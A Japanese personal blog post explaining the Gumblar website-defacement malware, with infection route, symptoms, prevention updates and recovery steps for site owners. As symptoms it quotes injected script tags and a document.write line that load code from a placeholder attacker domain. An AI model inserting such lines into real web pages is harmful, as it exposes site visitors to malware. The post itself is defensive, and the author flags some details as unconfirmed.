でろぐ

でぐちのブログ略して「でろぐ」

Gumblar.xによる改竄のまとめ【予防と対策はしっかりね】

ここ最近twitterでもこれの話題ばっかりツイートしてましたが知っとかないとかなり危険なものなのでまとめておきます。 まだ不十分な方はやっておきましょうね。

【対象ユーザー】 サイト管理者・Web担当者・一般ユーザーを含むWindowsユーザー全員

【感染経緯】 改竄されたWebサイトの閲覧によるスクリプトの読み込み許可で感染

【感染後の流れ】 まずはFFFTP等のFTP情報が盗まれます。 (FFFTPだけではなくほぼ全ての無料FTPクライアントが危険という認識でも問題ないレベルだそうです。未確認情報ですが。) 次に盗まれたIDとパスワードによりWebサイトが改竄されます。 改竄後はサイトに以下のような症状が現れます。

サーバー上のhtml、php、jsファイルに外部サイトのスクリプトを読み込む記述が追加される。 HTMLやPHPには<body>タグの前に <script src=http://Gumblar.x/_vti_cnf/nov_news_0403_PCGemilang.php ></script> JSには最後に document.write('<script src=http://Gumblar.x/images/index-2.php ><\/script>'); のように追記されます。 (上記のアドレスは適当なやつですので実際には複数の色々なドメインになります。)

この状態までには管理者が気付かないまま進行します。 改竄されたサイトを放置しておくと感染の拡大になるのでサイトのデータを一旦削除し対策を行った後サイトの再開をすることをおすすめします。

※現在わかっている範囲の情報ではサイトの改竄はスクリプトコードが書き込まれるのみですが今後はわかりませんので注意が必要です。

【感染の予防】 とはいえ、まだ実際に感染したかどうか分からない場合は予防策として以下のような事をしておくことが推奨されています。

・「Windows Update」(Microsoft Update)の”自動更新”を有効にする。その後の手動更新も忘れずに行う方がいいと思います。 ・「Adobe Reader」を最新版に更新する ・「Adobe Reader」の設定でJavaScript機能を無効にする(編集→環境設定→JavaScript→Acrobat JavaScriptを使用のチェックマークを外すことで無効になります。) ・「Adobe Flash Player」を最新版に更新する ・ 「Java」を最新版に更新する (不要なら削除、あえて導入する必要はない模様) ・ 「Apple QuickTime」を最新版に更新する (不要なら削除、あえて導入する必要はない模様)

【もし感染してしまったらor感染したかもしれない疑いがある場合】 セキュリティソフトで全てのドライブをスキャンしてウィルスが検出されるかどうかを確かめましょう。 仮に検出されてしまった場合は感染している疑いがあるのでOSの再インストールをした方がいいと思います。 他にも色々手段はあると思いますが、OSの再インストール後にセキュリティソフトを最新バージョンにアップデートするのが感染後の最良の手段でしょう。 もっといい手段がある場合は教えてください。 もちろんOSの再インストール前にはデータのバックアップをお忘れなく。

【サイトの再開に向けて】 OSを再インストールし、セキュリティソフトを最新バージョンにアップデートしたあとは一旦停止させていたサイトを再開しても大丈夫だと思います。 バックアップしたデータをその記録媒体ごとセキュリティソフトで診断し、ウィルスが混入していないか確認します。 何もない場合はそこから以下の手順でサイトを再開させましょう。 (以下はレンタルサーバーを借りて運営している場合の手順です。こうでなくてはいけないわけではないので御自身の判断でしてみてください。)

1.サーバーのコントロールパネルからFTPパスワードを変更する。 (仮にID,PASSWORDが漏れていた場合には次からアクセス出来ないようにするためにはパスワードの変更がいいと思います。) 2.FTPでサイトに接続し、一旦全データを削除する。 3.データをアップロードしなおす。 4.サイトをが改竄される前の状態に戻ったか確認する。

※FTPのパスワードは感染していないPCから行わないと意味がありませんので注意が必要です。

【最後に】 上記の事は僕がここ数日間かけて調べたことのまとめですがこれが必ずしも正しいというわけではありません。 スパイウェアなのでアップデートしたものでも感染してしまう場合がありますのであくまで参考までに。